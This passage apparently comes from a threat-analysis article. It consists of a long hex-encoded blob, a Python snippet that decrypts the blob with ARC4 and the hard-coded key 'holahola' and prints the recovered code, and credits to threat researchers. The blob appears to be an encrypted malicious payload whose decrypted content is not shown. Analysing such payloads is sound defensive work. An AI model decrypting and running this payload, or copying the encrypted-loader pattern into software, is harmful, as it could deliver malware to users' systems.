E19518F9AF6676E7DDE8C9BB8F22EACB1E4B913FE205B00E9A92CD09CED615EB746480CE66A225AEADA699A724CDA37F417C9FA0DD38092D36030173935035EB848C79FDECDF26A11B9AEDBA894650F881AA1C93C8CC200F5DD41BAB74163B7087EF2FAFFE4A7D478047D4BC868FDF4DC9882CD37DD3B23C657B330CD890BAEE5DFE1F9167B44F9461CD0569B0A8B1445B373DBBCD37C85238C9EBA5F97134AD1D848B0A7E0A2770169EA8E5639F80F0C9F541AE886C9E847536ED404EE063D76A34C7ED181F4E0D5C7A1013711CBECC627959A094535792993C6EDA79862220FA67247D0C573D903104F1954F54DCA202F2EC9F1D9BCFFF19F2A9BED447C4089BD2A1065C1D6A016A37CD7F89AE55B8749031E52F3D0085316C55D4784AC8FFA308D593BE2600F38E42BEF249B448ADDD4A7B33519FBBBE54CE3A62AD4B8F027A75867E0D6078ED340DE35B4021A76E72FD2A450D0C7C90B2B52A521526FC22B5FC2033B84FC9563E2F4F7AB7AEA6F7802039CC555C0624E68BC72C16FA9735022D1848A68831ACDE3FAFFE6D1B8385743348BB758A9D31C1BB2419FDA281923CA78546E04C2571B0ED376F262A4F53D1E00E51F91DCAC84D17AF6FB243186E3197658426F817DE69158D4ECAB10C86CBA203447B05268972E49276D8FAA06D1BBA31CBA38679853D82D1AA9F03F53C06991DA6A5B9056604BC1FB788DFAC5BE2DE1E56D47BEF84EBE20938AE26F1ED09E0594020417015A2CE24AB7106F3FF79CB01FB7C3B91F63F23FE4C1C5175701710724A8ACE0EAB8458A67C05E1ADAD553A2BE14FAB1EF3C5CEC7AE63C0DF4A5A0020145AD2378F0E7CD60097F59843196BFFA16B0BDEF6D81B2DE6B8C56E8C3249AB8826AC6356E5CD0B93ED05DC8F037B5C657BE2DB30AF0B7034E171DBBFC1E0D303ACC19C57FC29743570FE34B2A369280F0E6269560F3A098776FDA95280D39FED839EEBADC43386CC39434DDC5D9B09925197AEE55B1CA97610DB1DCFDDF2ECC8545E6BAAA995F7AE2B714C90C19CCF5EEFB27858F96CDC01E27BC3058F3D31251D0D8F75F8A0661F8001F516F93C3860CB4B14A0FB2349D4856C720ABC049D3D72773BABA043AF4997E2F98278375E9EEC921B01BD88EFAE9C322805FAB23685AF1FEF69F66ACCF5D927941C3BF9F575796F9130BDD42123BA55490A548393EFE59BC6B93C04429EAA7BEAE5CCC790E6F1AC95D3C4DCE2737418CABE076AB967410B80F8610243754F2722EA7C13E450A6A33832AA5177B42333C87DC8952745AA85DC8E432BA418B5540F72F35AC3EF79AE0CFD06F7318C2CCACF7DEDF22F25FDE475BF407D6A7A8A7064EFE2AF6F6BDDABAB76F6545C9BF4B1767FA2078BBD6172DAB5E059E9F9EF21809E0DEAB513A61A0ED5F114FD63777A5974761FE17EF1753910558A482EC87E67CBD8B6CEF443FC403146746A5590709AF54A73BD8C9DE71E188D14B08DD676095A206C0045D112F4D41E3CE49A43F751CD847BA6AA603B22A98A110E8454AB2C54630DF52BC27A543D531119BB3C408A388B6C745A87233A6A0BBCEE7ED155A861056D003FC964480E59770EDD013B2DBA2EA1EACC8F560A9019805A11DC9FE627805BF37DF89F5E21DD8F1826A12F8091A842D807CB04CE65DE9DE3FD5302FD2DC6D0E3A3E89D93A4513C8E7DD842E222F35B455032E77178FD305841B53452DA31E4684D6646B786D45BECFF10DB090BA316B742B5CBBBF8F1A974CC1D3C215572D02C02CF7FF5279C155ED44C4F45F8B2A478F501EDF866DB33A429E0F120091779709E8254E95FBA0CB3DFFFB1AC7EDB82F0566742BF845E114ED20CEDAA43F0DDA3CEBF7F313E87F09882273DB5910B485655378576BF6D44A0790D4EC4401565484F41B066628ECF6930D39FCF7BF2A3FCF91DE80FA984F7F033A04170E2B115AA308AADC86C3A484B178524F83D2B124F3617365C932123C5BF60F79C0A9AB3F864BBC4AB6D869C3CA3FE7B59136E622BE10AD98291DA97217BB08941E24B0F5C11B0F464629FF274114060A4B3F92104FBC9A77FB4F4F9E47BA109CF49FED8F1A916D7CD2FC4811D1ABBB11FC182F25BE911B416FE9A4E4EA85A5977932AFFCBE3DE124CA6450FFF5653E90252D3B081EB371E5A8D70F2268C640A95233D5E94F519F3C287FD08ED25E6BC2D28C6629E002417DCC529A0417DB11C94CEA774F42991DF8B06921528F74D38F1FC535BE30603AB8D436AD3B96C598495902AED3671A35F39BD88C2FFAD4EFB721DFA705125AE92432D210BC69710C1FAF555F4DDFB6D37C5424048A6C3A08617231DCABE906471F92E2736D9C3F6498E80D23D71F932AE82A9D868CADC107C9C93E5D8EDFB2ABBE7233C9965DD5DEBB897BD84C5ECFC90CF71C3721D02D69DBEA31DC05D27E731F87005FDFE141E2D2C1B6072C7C5AFF239C47D7C2804FBFCABA6482AA7520F9FDB00B7C386BA6EED42375478C5AE2DB7A1ECEEE4DCDC556FD6B46E5A646BAC7D5C61B476DDD8BE84B7F191BD1432E3CBD7A4509BF93CD4208108843C679328DCB2759EE456A55C8B343E17B27CFFB67D25D66DC378AF8D9B9003A3072923C9CC5C905BF89D2DBF3B7D616164F6C3A9BA06C28F62A13AD53A5533B619B7345936137E77DFD80D12DBF6C60BB789B9BD662DBE5B9B52F37E6D415B857060F312899A32767EDC096CD22298954F6C6263746D1CD8C1D69FF50759ABEF38C5E7218CDD1980A1C9A0A108DB324D81ED398BB20C7350065746483443AFC98284F66F90F392BBB34BB6E1A40449605DF63D7EEEA0405C9994B87778BA668FB5EC03FDDFD8CF5ADC8C6FCB076DF16299D2D4A0BB68F2CF9B70F730BBCCD475B4B691F84F390CEFCC19A811244AA114C3999E5555757FD7DD276E82303B2F00B4202C8CFAED4CB926E93358E426CE4552A70A16AEE7B787BCE1203287C66E982F8098A48E9B5B7744F805187E1A48C043D3590FAC2755F49AFE9C055E67268A32347DAF74A64ADE7034F7D38D9CAF97CC086558C50F52D38820CBCA55D54803214D82E27054A3C9983C6190316EC24FD3733E2EB6A8FAB011F89BD4B0D3A94CBFD75DE637F049BBDC5D6623AFDE5A0D2774DB2515015A68951393E027431CCA1265AC2E6CDC1EDFD34D59AD9C0047DDD2D89DAACDF2916B00B90B9875FF8A1D72BBC493DFC6EF65225B5968A99F1833982EEB99F4BBAA3AE5BB6A9ABF38D9BD1F4B96573879CB8CF06339F92DE94DCFB86000E63094A96D70D3F82F9F4BC43F833B7C0DB0F73E7B43AD7B01C944939BA5639F86C7B2664C1655E4DC89A4E4E4976CF2DD5960DD5039EFBDE4D3CD17F84491E29BABF07946730F890C4962EF0A9FC1C65A586427B39413833A03BB615667E1E66E2CA474106F7CBC8B02BD063291DF1FF6713588E1DD3A2D5A6BAF73B28DA92A1C2F4F4D666CFA51B3F6BEE34C549F07A108A0D97A7A6395D08F471DC370905BF5EC85813F416A817872AD56065BD1070DA108920B9C7CB12443C12E264E1CFBF70DFF085F78E7B0D05694ED4C6A7231848E4A878E0FFFCA211A3FC61BD09E2AC116A574267F84B2199277351C3E97BACA1C2FB1EA413C484A34E6561C11A9BEB30C647BF0FCF5FDBF8654C61E4BF90786563707B6B686062C789798175CFA47BF03B51F3A8B12E90B1AC1E35C675BBCB622AD511224F5969699C5C39FA4AA5AA4815F94FBF48D13894D4ADD0112373403D30B3CB67D5E66D2F404ED90617A5ADB0A2BD27B3DFCBB9D2AA44F57606D843ADF6E8F5A1C47B34BA2DF1057088C3E57803B0321090506531107A4929326FFEAABA5A86D885E543E436365F2083AFE05B837D20CD1ED400915761892F0BD9A8B180BF91B8295EFBED5D5C8D81C127D4931A78B97EAE57B03A6DE3A0A016825A6791BB0D72D82DAC86B20D620B628AE626A614B7DE59175E45D2346E161AF1E3793ACF7B1F69727E2FAC6630274B898C6F08E99E7939A32A6C2866929A1A6C683BC0C9125BDCBFD6C73218847FF85DA9DBE15A831BE42075D85DD551392F18ECB614981C2EF4F04EA4FDF11511CFBFF212EF76BACC4DB0A97CD9507CC0DC9FF175DCE87A0D951B571BC30D27306407528EA51D04DA44670C5494B80EA48C5ED98BDFD25FCFAEB985A0A642F14C7588F70EAF2BEAC34643BAB9CF608635C7F1C3AFE34A59E40ACD3FCE4FF0D0F5A5427DE1842D6462D9941488521AF82984237BC0BB13BC52476A46D198DF276ED48F2E3BD50AB37586C14F5FF06E5AA448D4B85150BE4F939DEF01FCF84D1AA9C69E676CDF6D68D7C6F0AF176F7C5A193A7D0556A9491601C9DE3AA650C2D13AC03F87A5E42E33291E1F26F4423A782A076F3223ABD5A35887236BE69FA329EA4938A65510F3F47535D3E9F0ACC18D14F70194CC246A1FEB3DF76D5FF3C3841E45640C152A2E03B3FB76F69F10DA6D3E610C3E2D24F505412D82B942797836DA0F2CBC0A861D3E39E84F9FBF83081C46E919C7F01E2206DB137AAA498DAB2FC99440B2ABEF588AA710029F8372FAEAD30C7C66DA6B185E495B3BF35C95682B1CA8702126E23137D76E0DAF8ADDE32BF3B0451F1C94C6B2ED738F951FF89FDE96A694F4830D3622DD7EEB845DFB034F02A92855E4752EBBA5B2910F3DA2FA9B1E3B7C3098BD0128D157C976BAD0F08D34F8D7119E46D989AB5E289DAC86516E04D7B2275E897895D4DCEB3FDE6724E894C33E8201ABC91E14955DF59A44BE016EB4DC350EF587AA5D9C4F3E0EE5382667220FB3F35C7A8E6E51EA195A91CAAFA02460524DC87AEB61A21C8A3F11F975E56CA1FF83D9BEBB9A4C680E213B69846C44571B790C71904168A5AD3C643C67837A1E3DCE06CBC3829E78BF7C4D611B88C134C4196136B268ECFF011A8E1AD526CA5BC3FC5898579AB5C779D8F3DF4A9771C3EDC292741D8A36552D6D9C0B1A154B16D79AA4CC7D026EF00BD787A62533375C41CC0D90E608EAB86646965021D211E452C48452503326EC14CDBFCC4F30443173F664937F920ADD0C03CA50D38A5B0C7B05C8DF2F5D5FA99E1A761DA9FE10B3DCB44CC4F85C064830748BA0DA7396640581F9534B72DD92F49A826D939F43DB4548A0C30B8843C0F1D4D9C2FCE4A56CD6F238679A4835B4E0C13B216587A621183C9A66F5A12E472E4468DBB702C5A9AE4EADBD0EA1DB3C6CE0BCC9C33CA83464A7D363305EA7138CC9A1C430DAD5B5BCE754B98F891EFB71633CD203161A27EC27D25FAA1C880C2DEEA712B34F6C881420C1AD95B9E459585739B64DB8FEF24E938C6E28366E649B7E9AC2A635B5A5A86E25C03EF2E2FBEBAF5A2AAA0AF21839C434DAEC5C3FC192609A2E01364764B32EAE62A0FBCB616890B16CAD84016791DF13C8E5696D0E6F11D8053F15F5F1A11643AD9BA53BEC61DC63CE02B3224B4D658DECC9C01382D521162167687B26F9AEBE375274DD497E1D58A4E750AAE85CE76E487FA04050E732791F9C983B5CBCCF6EF119CAE78E1FB73CA117852E2B3A0322DB4AA7B19C3B8E360663D7B41DCA379F1985ACECE9A2F6C1BA0911748CBAF3CC98EE3985356BFB00504549B43282CE0BB2C86A706DFB4F92D17875FA903226095E17CFCB53DBD989F24891C35F51484A4259DE3AF1FAA7C90568F2FF4F35C0B276AD39550D7C06DDA7E9D555CEB5C56232BA9DF271A004AF2F7A7C304ABDB31BD029D28BD91B81926007ED8502AFE92EADC36F7404414875AF13CF4A2FDEAA92DB11C9FF850ACB798AD59D6A7EB07B4D40F8A03E9300540CCDBB54DC86E91E22201C7D85F182FA825DB53EC3A14A7089E56AC23B64495AC8E4E53068A7B2799ACE4C7100C51322BE145C3E6D23FFD159D2635AFA28683069A42C870119FBFF93FD6ADA29426C2F5DE8E7EAAA4DB0185812FBEF7E7068CA4BC5FA0C5D8B5353C1952F9EB340FCCC6BFCF054128CD56BAC7CE8D49D97DE32F66EFC28493147B72EBBD27215706C934B22FDFADDD104F293A0C5D37CF407133898F86264853A702F0798C4A10916E73747B86D897DD7CFBFEEF336D1AB70BE158FC645F3AE82037CE4D622E80F27AE438E86A4B33351800E596243131D6CE26F648524400643715C8C59F59389D7AA89B5519A1EEE64CAD4E5AA73DD1AF7209A91F88748ABAD5E7C51D48BF339EF15642F6CB43790F7D3776EA1AB184470D9D28DDB429E73DC46C5227C9F6AA7A6B273F263D8A7B7645ECCABE4347F8A8BB8C822708C674447E390E2CCA1E2C776810AD4496B45803FC153046FE59DA5E1D5F37C4D5A362022FED50147370E6CE66C153E7D0FA6C4EE4085F238B966AB3CD04D1ED651B7CE2399075E0E5585DF6204CD89F3C9AF97B26BF1F5B6409CF0BAC7D1A6EF797D198003736D0A3AC8B3516C2FF0EC4E2D5F02BF1F7A547D5189048AD0C191B5FD19DF76FBF5F11C812829AFC8C2628371957698813FB9CFFE5DE0B6FBE4ADA8B18BBA7803EBBC617DB3A3515E8F04FD8E0E0D7C8928D6849DACA8DD721E817CD6A4B15E710D769C6407F1C256EC535D90AE0B1D34C4D633061436C07028EE6A17FCDDD9EC185E1187A675716538044571A3F6AFC7753F920238239663A5E8F436183177603087BC19C721247739265E4230786FCFB4556F3725D61600394EF656B179CEE4DF29EC0F3D5AA8683E2D9D2FAAF9B7DEB0E5D9C25EB526956715F4CAE3FBFBA61E8C00F309B31F4D33E4E15F18D6FC6F0369002EC65E771C541F759AFC35DAF6707241EC401DFEBEBB84F86C3559D5F0D6865F3BE060A16960D7D42A5720B17A640B352861B9CFF4F4D8BCF451AAE4587CFA281D8368CCD2ED862EE5D1F0BB477A5B343A0414498AB8DCAB891992A8C42D63493AEE84E16EE0A01AB0C7446791C58C43A2E7ACD1B6B3736BDE5F8C0D89C93AC1CB946F3DF4B16CB6B48846EEAFA06733D3C9BB4D05E1C41F6C7E2B95D7BD13E37C91CBA6474875BF65030137E842D1EAEA86C22137A862C19E84CEB9D8736633E5FAF042B9470CFB6B5AB4E1E83D95716D43A3CEF528F80FCA61361726D69806CBD33F16DFF19FAB485C38143E1B740172FC420DD78CAEF1EC696E31739077F09123ED584F93FF738FC47D6A4ED0C4B2A6BB6AFB57FFC839C47E5D05405DB851EEFF2AECBFB277D2C5801AAABC5FEAF31C57B061A0091762DED9000A39B5AA65A9BEACDC471CD39380FFD106EEED1665A58CE59B3159CB7FEA901C0CC0DAA90FD1F4F06D68DB7328461E9231CAF9D6660EBA205F7870DA232F51A1430E5B80E1419A17EF56D9442F036A3F730AD3601FA1A545694BEDA62B82030C292DF6C40310FF2A5F169B58CD1C5913C616F266129F0FB349A39508F855A31798D2D5B3F747D916078DDD85C96A7ED056A2AA589C425D20AF312C068927FE73F41DD38B717EDACD8DE78468CDA78096428F653E90901606B12500D8B1301B5A8B7839DBB8732C48A6BBDDD69FD856F786DB73B33EABBDECDB6E3026C9B932DB847A07710A0100A597FD8ED20785F69E87EEE6D9C73AD42EA7725334923B9A42D04E783BFD95B788E84FFDBEFC0AFCE12C6120784E8D8B6C1A4D9F462CFC2CDE400F922ED229359FE79A7BD3668A2D9278D928AB019A5BD692044BC17795BAF3BE148B728537A7E97D1991D38CDC185734EEB6D743368C4FC41964C1DB8FFAC5DBF3846EA8C74B7B2EE18408DD59A9F03246CBD8CBA7F728B065428F87062D1B5A13C03045E763C4364C269DBB01F2A9817509F99CA0F565F06641E566C19DF2A2E03628C8D20A8DDC1F488016A19EEEB5632A4526E0591B0B0E28B52EA49521EAFF3FC358012CF1DF502E6F3E55B3F426E06DE4A925DE4D9C63EB7FE0AB0C5DCBCBAAF5550D7EDEBBD10B9F5DB4374CEB5489321285D5E3355CF9DACAF9E81169AF47BED6B6612D5C59F37929AE5AF5F2FEE57C8342DE0082F5AE3AF25D9FC01B7108B9116BB11DC623E2532CA8E3F8D4793993CA2F273796AC7813866574A09C65E6BF4A9CB8FD83E8FF0CF6AF8831248B0F1A728DC230F18ACC15190160F214A0D870A9BB94F29AD3C57404384997454AA08A747A89DB56F1B2DD28D2F3E2D6EF7BF5A2B5928F29D0922ED911B45E5D387B926ECD5D0817B7E86E98FABF0CCCB2BA0BD855391D37B9DBD26C4FEFED88F4883299B6BF4FE0BE7921A3D0FD40F812372911523FCF232D4E350837903C263D18F66660EE90E807EF933C1C5CE7757949CAA8AFC89A707A7F4864A726491B94B71B4B4291FB2CFB808B7C0A561966DCBD77C2418BB3D8CF1A261EED91EFE705D389A74D37A6C3802BB08690DDA6241DDB69EFF660D8CE76AEEB3C04D1C73A10D367B752332799FFC9B56F53991459D5D1BE996DFB8AEE6CE7A406249414546F7256B8BBB34EA9D1948F3C88027FBB3B6E68C7C2CB67BFDEF312157F582765BC07F842C03FC09248C47C80E0A1F611FF088EF42916072953151A6C4712FE2ADE59BA40592DA3204601E900C51645BA65FBBBDEE34353E9E64E7AED7119797D157BC9FA60064247E90415E9E2D65B6BD2B831CFE27A2551FCBA655106C8C260FC80A4639016042332DCC0A79F5952CD925E0DE2798A55E0D533ABECB4E84D2B2AD183E6D5949501FD5508DBFD5DDEB66FAAB2FA162ADD1E7DE8A6C6EBD2B6745E638A13D7D53E7EEF90A6CD8BAA46A2926B2EC7C042BFA212824165E3B245DC62D803256FE9FD5C1845D65191F6E4C0C6A948519DF4A"
arc4 = arc4.ARC4(b'holahola')
plainCode = arc4.decrypt(bytes.fromhex(data))
print(plainCode)
Thank you to Igal Lytzki, Perception Point Threat Analyst & IR Team Lead, @Merlax, and others for their research on subject.